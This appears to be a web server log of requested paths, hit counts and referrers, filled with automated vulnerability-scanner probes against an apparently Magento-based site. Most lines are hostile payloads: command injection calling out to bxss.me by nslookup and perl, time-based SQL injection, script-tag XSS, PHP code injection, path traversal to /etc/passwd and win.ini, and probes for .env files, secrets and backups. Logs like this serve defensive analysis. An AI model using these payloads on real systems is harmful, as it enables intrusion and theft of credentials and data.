/acc/skin/install/%3b(nslookup%20hitsytmjjtwwx41109.bxss.me||perl%20-e%20\"gethostbyname('hitsytmjjtwwx41109.bxss.me')\")|(nslookup%20hitsytmjjtwwx41109.bxss.me||perl%20-e%20\"gethostbyname('hitsytmjjtwwx41109.bxss.me')\")&(nslookup%20hitsytmjjtwwx41109.bx 1 -
/\"+response.write(9144333*9885293)+\"/js/mage/adminhtml/wysiwyg/ 1 -
/Http://bxss.me/t/fit.txt/js/varien/js.js 1 https://104.36.149.61/
/config/secrets.yml 1 -
/104-db.tgz 1 -
/\".gethostbyname(lc(\"hitih\".\"uspoqvyacafe4.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(113).chr(70).chr(107).chr(85).\"/skin/install/default/ 1 -
/bxss.me/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
//settings.inc 1 -
/acc/js/1%00%c0%a7%c0%a2%252527%252522/adminhtml/ 1 https://104.36.149.61/
/acc/js/..%2fmage/adminhtml/form.js 1 https://104.36.149.61/
/acc/js/scriptaculous/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500.js 1 -
/bxss.me%2ft%2fxss.html%3f%2500/js/varien/form.js 1 -
/dump.tgz 1 -
/'%3bprint(md5(31337))%3b$a='/skin/frontend/ 1 -
/acc/js/prototype<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/debug.js 1 -
/acc/js/mage'\"()&%25<acx><ScRiPt%20>gJZT(9233)<%2fScRiPt>/adminhtml/product/ 1 https://104.36.149.61/
/cgi-bin/search.cgi 1 ()%20{%20Referer
/acc/js/%2fxfs.bxss.me/translate.js 1 -
//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini 2 -
/|echo%20diysaz$()\\%20xbeqqj\\nz^xyu||a%20%23'%20|echo%20diysaz$()\\%20xbeqqj\\nz^xyu||a%20%23|\"%20|echo%20diysaz$()\\%20xbeqqj\\nz^xyu||a%20%23/js/mage/adminhtml/sales/ 1 -
/acc/index.php/install/%2fxfs.bxss.me/config/ 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/adminhtml/hash.js 1 https://104.36.149.61/
/acc/js/mage/bxss.me%2ft%2fxss.html%3f%2500/flexuploader.js 1 -
/acc/bxss.me%2ft%2fxss.html%3f%2500/mage/ 1 -
/'+response.write(9994247*9896308)+'/js/mage/adminhtml/events.js 1 -
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/varien/form.js 1 https://104.36.149.61/
/acc/js'\"()&%25<acx><ScRiPt%20>yxiC(9022)<%2fScRiPt>/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/%3b(nslookup%20hitachjqjwfor6fc50.bxss.me||perl%20-e%20\"gethostbyname('hitachjqjwfor6fc50.bxss.me')\")|(nslookup%20hitachjqjwfor6fc50.bxss.me||perl%20-e%20\"gethostbyname('hitachjqjwfor6fc50.bxss.me')\")&(nslookup%20hitachjqjwfor6fc50.bxss.me||perl%20-e% 1 -
/nstview.php 1 -
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/acc'||'/js/varien/form.js 1 https://104.36.149.61/
/Http://bxss.me/t/fit.txt/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/acc/skin/install<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/default/default/css/iestyles.css 1 -
/acc/skin/install/default/default/'\"()&%25<acx><ScRiPt%20>eCQQ(9549)<%2fScRiPt>/clears.css 1 https://104.36.149.61/
/acc/skin/install/default/default/.%2fcss/iestyles.css 1 https://104.36.149.61/
/system/console/gatewaystatus 1 -
/backup-104.rar 1 -
/'+'A'.concat(70-3).concat(22*4).concat(114).concat(78).concat(114).concat(86)+(require'socket'%0aSocket.gethostbyname('hithq'+'tpyovqfg1f58b.bxss.me.')[3].to_s)+'/js/varien/form.js 1 -
/${9999266+10000130}/js/mage/translate.js 1 -
/-1%20OR%202+278-278-1=0+0+0+1/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/acc/1%00%c0%a7%c0%a2%252527%252522/prototype/extended_debug.js 1 https://104.36.149.61/
/acc/js/prototype/%2fxfs.bxss.me/ 1 -
/\"%3bprint(md5(31337))%3b$a=\"/js/prototype/windows/ 1 -
/acc/skin/install/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/default/css/reset.css 1 https://104.36.149.61/
/acc/skin'\"()&%25<acx><ScRiPt%20>xIbD(9073)<%2fScRiPt>/install/default/default/css/reset.css 1 https://104.36.149.61/
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/mage/adminhtml/events.js 1 -
/acc9725145/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/SdX06h99'%20OR%20479=(SELECT%20479%20FROM%20PG_SLEEP(15))--/js/prototype/debug.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/..%2f..%2f..%2f..%2f..%2fpackage.json 1 -
/appsettings.Development.json 1 -
/login.jsp 1 -
/|echo%20tnwtft$()\\%20wnacug\\nz^xyu||a%20%23'%20|echo%20tnwtft$()\\%20wnacug\\nz^xyu||a%20%23|\"%20|echo%20tnwtft$()\\%20wnacug\\nz^xyu||a%20%23/index.php/install/ 1 -
/response.write(9928247*9362652)/js/mage/adminhtml/uploader/ 1 -
/acc/js/%2fxfs.bxss.me/adminhtml/form.js 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/adminhtml/flexuploader.js 1 https://104.36.149.61/
/7GhYwKaJ/js/mage/ 1 https://104.36.149.61/
/1some_inexistent_file_with_long_name%00.jpg/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/evox/about 1 -
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/giftoptions/ 1 -
/echo%20cmclcm$()\\%20qrmlun\\nz^xyu||a%20%23'%20&echo%20cmclcm$()\\%20qrmlun\\nz^xyu||a%20%23|\"%20&echo%20cmclcm$()\\%20qrmlun\\nz^xyu||a%20%23/js/mage/adminhtml/wysiwyg/ 1 -
/extjs//examples/feed-viewer/feed-proxy.php 1 -
/^(%23$!@%23$)(()))******/js/varien/form.js 1 https://104.36.149.61/
/cgi-bin/appsecrets.json 1 -
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/adminhtml/ 1 -
/\"+response.write(9994247*9896308)+\"/js/mage/adminhtml/events.js 1 -
/acc/.%2fjs/mage/adminhtml/sales/ 1 https://104.36.149.61/
/scripts/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/shells 1 -
/cgi-bin/Vagrantfile 1 -
/\"+response.write(9732476*9061845)+\"/js/mage/adminhtml/form.js 1 -
/core/lib/php-ofc-library/ofc_upload_image.php 1 -
/1%00%c0%a7%c0%a2%252527%252522/js/prototype/extended_debug.js 1 https://104.36.149.61/
/\"+response.write(9864369*9044517)+\"/js/varien/form.js 1 -
/..%2f..%2f..%2fweb.config 1 -
/cgi-bin/Gruntfile.coffee 1 -
/acc/js/1%00%c0%a7%c0%a2%252527%252522/adminhtml/product/ 1 https://104.36.149.61/
/1%00%c0%a7%c0%a2%252527%252522/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/prototype/ 1 https://104.36.149.61/
/acc/js/..%2fprototype/windows/themes/ 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/mage/adminhtml/ 1 https://104.36.149.61/
/bxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/events.js 1 -
/acc/js/mage/adminhtml/%3b(nslookup%20hitekdjabzeuie2343.bxss.me||perl%20-e%20\"gethostbyname('hitekdjabzeuie2343.bxss.me')\")|(nslookup%20hitekdjabzeuie2343.bxss.me||perl%20-e%20\"gethostbyname('hitekdjabzeuie2343.bxss.me')\")&(nslookup%20hitekdjabzeuie23 1 -
/acc/..%2fjs/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/&echo%20dtgzee$()\\%20dtpbkf\\nz^xyu||a%20%23'%20&echo%20dtgzee$()\\%20dtpbkf\\nz^xyu||a%20%23|\"%20&echo%20dtgzee$()\\%20dtpbkf\\nz^xyu||a%20%23/js/mage/adminhtml/product/ 1 -
/acc/index.php/install/wizard/config/..%2f..%2f..%2fweb.config 1 -
/acc/bxss.me%2ft%2fxss.html%3f%2500/varien/js.js 1 -
/../../web.config 1 -
/acc/index.php/bxss.me%2ft%2fxss.html%3f%2500/wizard/config/ 1 -
/acc/index.php/install/wizard/beginPost//../../../../../../../../etc/passwd%00.jpg 1 -
/echo%20rhfyop$()\\%20vzillj\\nz^xyu||a%20%23'%20&echo%20rhfyop$()\\%20vzillj\\nz^xyu||a%20%23|\"%20&echo%20rhfyop$()\\%20vzillj\\nz^xyu||a%20%23/js/varien/js.js 1 -
/`(nslookup%20hityuyvwbtrfq88f4d.bxss.me||perl%20-e%20\"gethostbyname('hityuyvwbtrfq88f4d.bxss.me')\")`/js/mage/adminhtml/browser.js 1 -
/bxss.me/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/-1%20OR%202+23-23-1=0+0+0+1/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/acc/js/prototype'\"()&%25<acx><ScRiPt%20>KwaQ(9561)<%2fScRiPt>/debug.js 1 https://104.36.149.61/
/acc/js/1some_inexistent_file_with_long_name%00.jpg/adminhtml/accordion.js 1 https://104.36.149.61/
/'+response.write(9293666*9931356)+'/js/prototype/windows/themes/ 1 -
/acc/skin/install/default/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/ 1 https://104.36.149.61/
/!(()&&!|*|*|/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/acc/1%00%c0%a7%c0%a2%252527%252522/adminhtml/ 1 https://104.36.149.61/
/acc/skin/12345'\"\\'\\\") 8 https://104.36.149.61/
/manager/html/ 3 -
/response.write(9612660*9888266)/skin/frontend/ 1 -
/qKlv89Pr'%20OR%2031=(SELECT%2031%20FROM%20PG_SLEEP(15))--/js/prototype/ 1 https://104.36.149.61/
/acc/index.php/../../../../package.json 1 -
/1'\"/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
//%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd 1 -
/$(nslookup%20hitybabbwwjjr14abc.bxss.me||perl%20-e%20\"gethostbyname('hitybabbwwjjr14abc.bxss.me')\")/skin/frontend/ 1 -
/acc/js/mage/'\"()&%25<acx><ScRiPt%20>bt2L(9630)<%2fScRiPt>/hash.js 1 https://104.36.149.61/
/acc/js/mage'\"()&%25<acx><ScRiPt%20>Thnf(9252)<%2fScRiPt>/translate.js 1 https://104.36.149.61/
/'.print(md5(31337)).'/js/mage/adminhtml/ 1 -
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/${@print(md5(31337))}/js/mage/adminhtml/uploader/ 1 -
/rfILxfQv'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/acc/js/mage/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/uploader/ 1 https://104.36.149.61/
/acc/js/mage/%3b(nslookup%20hitkitzfqaqkwf35ab.bxss.me||perl%20-e%20\"gethostbyname('hitkitzfqaqkwf35ab.bxss.me')\")|(nslookup%20hitkitzfqaqkwf35ab.bxss.me||perl%20-e%20\"gethostbyname('hitkitzfqaqkwf35ab.bxss.me')\")&(nslookup%20hitkitzfqaqkwf35ab.bxss.me 1 -
/db/main.php 1 -
/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php 1 -
/http://bxss.me/t/fit.txt%3F.jpg/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/-1%20OR%202+53-53-1=0+0+0+1/skin/adminhtml/default/ 1 https://104.36.149.61/
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/adminhtml/default/ 1 -
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/-1%20OR%202+943-943-1=0+0+0+1/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/adminhtml/giftoptions/ 1 -
/&echo%20bbivai$()\\%20gsrkka\\nz^xyu||a%20%23'%20&echo%20bbivai$()\\%20gsrkka\\nz^xyu||a%20%23|\"%20&echo%20bbivai$()\\%20gsrkka\\nz^xyu||a%20%23/js/mage/adminhtml/grid.js 1 -
/acc/index.php/install/wizard/..%2f..%2f..%2f..%2f..%2fpackage-lock.json 1 -
/acc/%2fxfs.bxss.me/mage/translate.js 1 -
/echo%20hjiaca$()\\%20caneae\\nz^xyu||a%20%23'%20&echo%20hjiaca$()\\%20caneae\\nz^xyu||a%20%23|\"%20&echo%20hjiaca$()\\%20caneae\\nz^xyu||a%20%23/skin/install/default/default/ 1 -
/87kT7M4G'))%20OR%20605=(SELECT%20605%20FROM%20PG_SLEEP(15))--/js/prototype/debug.js 1 https://104.36.149.61/
/$(nslookup%20hitpbndgmsvki9d421.bxss.me||perl%20-e%20\"gethostbyname('hitpbndgmsvki9d421.bxss.me')\")/skin/install/default/default/css/iestyles.css 1 -
/acc/js/1some_inexistent_file_with_long_name%00.jpg/translate.js 1 https://104.36.149.61/
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/adminhtml/giftmessage.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/config//../../WEB-INF/web.xml%00.jsp 1 -
/acc/'\"()&%25<acx><ScRiPt%20>pdCA(9049)<%2fScRiPt>/install/ 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/mage/ 1 https://104.36.149.61/
/acc/js/mage/..%2fadminhtml/uploader/ 1 https://104.36.149.61/
/&echo%20xhfsbn$()\\%20dvbufd\\nz^xyu||a%20%23'%20&echo%20xhfsbn$()\\%20dvbufd\\nz^xyu||a%20%23|\"%20&echo%20xhfsbn$()\\%20dvbufd\\nz^xyu||a%20%23/index.php/install/wizard/locale/ 1 -
/-1%20OR%202+142-142-1=0+0+0+1/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/|(nslookup%20hitarumgmpzzuc1dc8.bxss.me||perl%20-e%20\"gethostbyname('hitarumgmpzzuc1dc8.bxss.me')\")/skin/adminhtml/default/ 1 -
/(nslookup%20hitzvmtuqipbf7ec86.bxss.me||perl%20-e%20\"gethostbyname('hitzvmtuqipbf7ec86.bxss.me')\")/skin/adminhtml/ 1 -
/styles/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/shells 1 -
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/mage/adminhtml/ 1 https://104.36.149.61/
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/scriptaculous/effects.js 1 https://104.36.149.61/
/acc/js/varien<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/form.js 1 -
//js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/AUrA4g6f')%20OR%20400=(SELECT%20400%20FROM%20PG_SLEEP(15))--/js/prototype/tooltip.js 1 https://104.36.149.61/
//js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/admin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/tooltip_manager.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/prototype/prototype.js 1 https://104.36.149.61/
/acc/js/prototype/windows/./WEB-INF/web.xml%00.jsp 2 -
/acc/skin/install/default/.%2fdefault/css/ie7minus.css 1 https://104.36.149.61/
/_adminer.php 1 https://104.36.149.61/
/${@print(md5(31337))}\\/js/mage/adminhtml/product/ 1 -
/acc/js/prototype/.%2fprototype.js 1 https://104.36.149.61/
//../../../../../../../../boot.ini 1 -
/'+response.write(9416362*9936609)+'/js/mage/adminhtml/ 1 -
/acc'\"()&%25<acx><ScRiPt%20>PjTl(9911)<%2fScRiPt>/skin/install/default/ 1 https://104.36.149.61/
/^(%23$!@%23$)(()))******/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/robots.txt 36 -
/acc/js/1%00%c0%a7%c0%a2%252527%252522/adminhtml/grid.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/config/..%2f..%2f..%2f..%2fpackage.json 1 -
/acc/js/mage/bxss.me%2ft%2fxss.html%3f%2500/sales/ 1 -
/'.print(md5(31337)).'/js/mage/adminhtml/backup.js 1 -
/..%2facc/skin/adminhtml/ 1 https://104.36.149.61/
//../../../WEB-INF/web.xml 1 -
/adminer-4.3.1.php 1 https://104.36.149.61/
/Http://bxss.me/t/fit.txt/skin/install/default/default/ 1 https://104.36.149.61/
/jQuery-File-Upload/php/ 1 -
/acc9615198/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/acc/skin/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/default/default/css/iestyles.css 1 -
/acc/skin/install/default/default/%3b(nslookup%20hitnmstxngylrd50f9.bxss.me||perl%20-e%20\"gethostbyname('hitnmstxngylrd50f9.bxss.me')\")|(nslookup%20hitnmstxngylrd50f9.bxss.me||perl%20-e%20\"gethostbyname('hitnmstxngylrd50f9.bxss.me')\")&(nslookup%20hitnm 1 -
/acc/index.php/install/wizard/1some_inexistent_file_with_long_name%00.jpg/ 1 https://104.36.149.61/
/assets/js/fckeditor 2 -
/acc'%20AND%202*3*8=6*8%20AND%20'bHVO'='bHVO/js/prototype/debug.js 1 https://104.36.149.61/
/'\"()&%25<acx><ScRiPt%20>JGJG(9166)<%2fScRiPt>/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/acc9342284/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/acc/.%2findex.php/install/ 1 https://104.36.149.61/
/acc\"%20AND%202*3*8=6*8%20AND%20\"OQpe\"=\"OQpe/js/varien/js.js 1 https://104.36.149.61/
/acc/js/1%00%c0%a7%c0%a2%252527%252522/ 1 https://104.36.149.61/
/acc//mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/acc/bxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/wysiwyg/ 1 -
//jHXrCzNw.php 1 -
/acc/index.php/install/wizard//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 2 -
/acc/index.php/%2fxfs.bxss.me/wizard/locale/ 1 -
/OD0vNH6M'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/.%2facc/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/'%3bprint(md5(31337))%3b$a='/js/prototype/tooltip.js 1 -
/web-console/ 1 -
/${@print(md5(31337))}/js/mage/adminhtml/grid.js 1 -
/${@print(md5(31337))}\\/skin/install/default/default/css/ie7minus.css 1 -
/acc/index.php/install/wizard/locale/..%2fpackage.json 1 -
/authenticationendpoint/tto.jsp 1 -
/mgmt/shared/authn/login 2 -
/acc/js/prototype/effects.js/955597%40 1 https://104.36.149.61/
/@@OeTjV/js/prototype/windows/themes/ 1 https://104.36.149.61/
/|(nslookup%20hitlxzzifozvka73c2.bxss.me||perl%20-e%20\"gethostbyname('hitlxzzifozvka73c2.bxss.me')\")/js/mage/adminhtml/uploader/ 1 -
/acc'||'/js/prototype/prototype.js 1 https://104.36.149.61/
/1%00%c0%a7%c0%a2%252527%252522/js/prototype/debug.js 1 https://104.36.149.61/
/|(nslookup%20hitqryxgrnygv76694.bxss.me||perl%20-e%20\"gethostbyname('hitqryxgrnygv76694.bxss.me')\")/js/mage/adminhtml/ 1 -
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/acc/index.php/install/wizard//../../../../../../../../windows/win.ini%00en 1 -
//skin/install/default/ 1 https://104.36.149.61/
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/index.php/install/ 1 https://104.36.149.61/
/acc/skin/install/default/default/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/boxes.css 1 https://104.36.149.61/
/acc'||'/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/skin/adminhtml/ 1 https://104.36.149.61/
/acc\"%20AND%202*3*8=6*8%20AND%20\"vZNB\"=\"vZNB/js/prototype/extended_debug.js 1 https://104.36.149.61/
/${@print(md5(31337))}/skin/install/default/default/css/reset.css 1 -
/acc/js/%3b(nslookup%20hitpkqyoeoklfb23db.bxss.me||perl%20-e%20\"gethostbyname('hitpkqyoeoklfb23db.bxss.me')\")|(nslookup%20hitpkqyoeoklfb23db.bxss.me||perl%20-e%20\"gethostbyname('hitpkqyoeoklfb23db.bxss.me')\")&(nslookup%20hitpkqyoeoklfb23db.bxss.me||per 1 -
/acc9127060/skin/adminhtml/ 1 https://104.36.149.61/
/acc/skin/install/default/default/1some_inexistent_file_with_long_name%00.jpg/clears.css 1 https://104.36.149.61/
/script 1 -
/acc/skin/install/default/default/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/reset.css 1 https://104.36.149.61/
/appsecrets.json 1 -
/acc/index.php/install/wizard/locale//../../../../../../../../../../../../../../../..//etc/passwd 1 -
/'+response.write(9207482*9743140)+'/js/mage/adminhtml/accordion.js 1 -
/acc/1some_inexistent_file_with_long_name%00.jpg/varien/js.js 1 https://104.36.149.61/
/3aKNKJaC')%20OR%20318=(SELECT%20318%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/'%3bprint(md5(31337))%3b$a='/js/prototype/ 1 -
/1some_inexistent_file_with_long_name%00.jpg/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/'\"/js/prototype/prototype.js 1 -
/acc/%2fxfs.bxss.me/prototype/tooltip.js 1 -
/'\"()&%25<acx><ScRiPt%20>c1E3(9150)<%2fScRiPt>/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/'.gethostbyname(lc('hituz'.'crjwccwe81a9d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(84).chr(108).chr(66).'/js/mage/adminhtml/grid.js 1 -
/KB76lEw7'))%20OR%20873=(SELECT%20873%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/.env 77 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/^(%23$!@%23$)(()))******/index.php/install/wizard/config/ 1 https://104.36.149.61/
/acc/.%2findex.php/install/wizard/locale/ 1 https://104.36.149.61/
/1%00%c0%a7%c0%a2%252527%252522/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/%3b(nslookup%20hitdfjmjeftag73a8c.bxss.me||perl%20-e%20\"gethostbyname('hitdfjmjeftag73a8c.bxss.me')\")|(nslookup%20hitdfjmjeftag73a8c.bxss.me||perl%20-e%20\"gethostbyname('hitdfjmjeftag73a8c.bxss.me')\")&(nslookup%20hitdfjmjeftag73a8c.bxss.me||perl%20-e% 1 -
/\".gethostbyname(lc(\"hitwg\".\"aphyazzedee82.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(121).chr(79).chr(113).chr(65).\"/js/mage/adminhtml/browser.js 1 -
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/varien/form.js 1 -
/acc/skin/install/default/1some_inexistent_file_with_long_name%00.jpg/css/reset.css 1 https://104.36.149.61/
/acc/skin/install/..%2fdefault/ 1 https://104.36.149.61/
/we2px8RN'))%20OR%20766=(SELECT%20766%20FROM%20PG_SLEEP(15))--/index.php/install/ 1 https://104.36.149.61/
/c5F0Ph5X')%20OR%20348=(SELECT%20348%20FROM%20PG_SLEEP(15))--/skin/adminhtml/ 1 https://104.36.149.61/
/log-viewer/ 2 -
/acc/index.php/install/wizard/%2fxfs.bxss.me/ 1 -
/response.write(9598149*9564332)/js/scriptaculous/effects.js 1 -
/%2fxfs.bxss.me/skin/install/default/default/css/clears.css 1 -
/system/console 1 -
/\".gethostbyname(lc(\"hittr\".\"esoqfnlt62505.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(105).chr(75).chr(98).chr(68).\"/js/mage/adminhtml/giftoptions/ 1 -
/YjEGy352'))%20OR%20763=(SELECT%20763%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/acc%25'%20AND%202*3*8=6*8%20AND%20'8mvp'!='8mvp%25/js/scriptaculous/effects.js 1 https://104.36.149.61/
/www/js/tiny_mce 1 -
/acc/js/mage/1%00%c0%a7%c0%a2%252527%252522/wysiwyg/ 1 https://104.36.149.61/
/1%20waitfor%20delay%20'0:0:15'%20--%20/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/mage/translate.js 1 https://104.36.149.61/
/'%3bprint(md5(31337))%3b$a='/skin/adminhtml/default/ 1 -
/acc%25'%20AND%202*3*8=6*8%20AND%20'ZWoC'!='ZWoC%25/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/acc/index.php/1some_inexistent_file_with_long_name%00.jpg/wizard/config/ 1 https://104.36.149.61/
/-1%20OR%202+414-414-1=0+0+0+1/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/graphql 1 -
/appveyor.yml 1 -
/acc/skin/install/default/.%2fdefault/css/boxes.css 1 https://104.36.149.61/
/^(%23$!@%23$)(()))******/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/acc/%2fxfs.bxss.me/mage/adminhtml/giftoptions/ 1 -
/acc/index.php/install/wizard/beginPost//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini 2 -
/'%3bprint(md5(31337))%3b$a='/js/mage/adminhtml/form.js 1 -
/'+'A'.concat(70-3).concat(22*4).concat(101).concat(71).concat(108).concat(85)+(require'socket'%0aSocket.gethostbyname('hites'+'igyokajw50c00.bxss.me.')[3].to_s)+'/js/prototype/tooltip.js 1 -
/adminer-4.2.5-mysql.php 1 https://104.36.149.61/
/acc/'\"()&%25<acx><ScRiPt%20>ntvJ(9551)<%2fScRiPt>/prototype/validation.js 1 https://104.36.149.61/
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/adminhtml/browser.js 1 -
/acc/1%00%c0%a7%c0%a2%252527%252522/mage/ 1 https://104.36.149.61/
/acc/skin/%3b(nslookup%20hitsmhcckdwjc2384b.bxss.me||perl%20-e%20\"gethostbyname('hitsmhcckdwjc2384b.bxss.me')\")|(nslookup%20hitsmhcckdwjc2384b.bxss.me||perl%20-e%20\"gethostbyname('hitsmhcckdwjc2384b.bxss.me')\")&(nslookup%20hitsmhcckdwjc2384b.bxss.me||p 1 -
/..%2f..%2fpackage.json 1 -
/acc\"%20AND%202*3*8=6*8%20AND%20\"Fv1I\"=\"Fv1I/js/mage/adminhtml/ 1 https://104.36.149.61/
/response.write(9166394*9259310)/js/prototype/prototype.js 1 -
/webadmin.php 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/varien/js.js 1 https://104.36.149.61/
/acc/%2fxfs.bxss.me/install/wizard/config/ 1 -
/eam/vibd 1 -
/acc/js/prototype/windows/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/ 1 https://104.36.149.61/
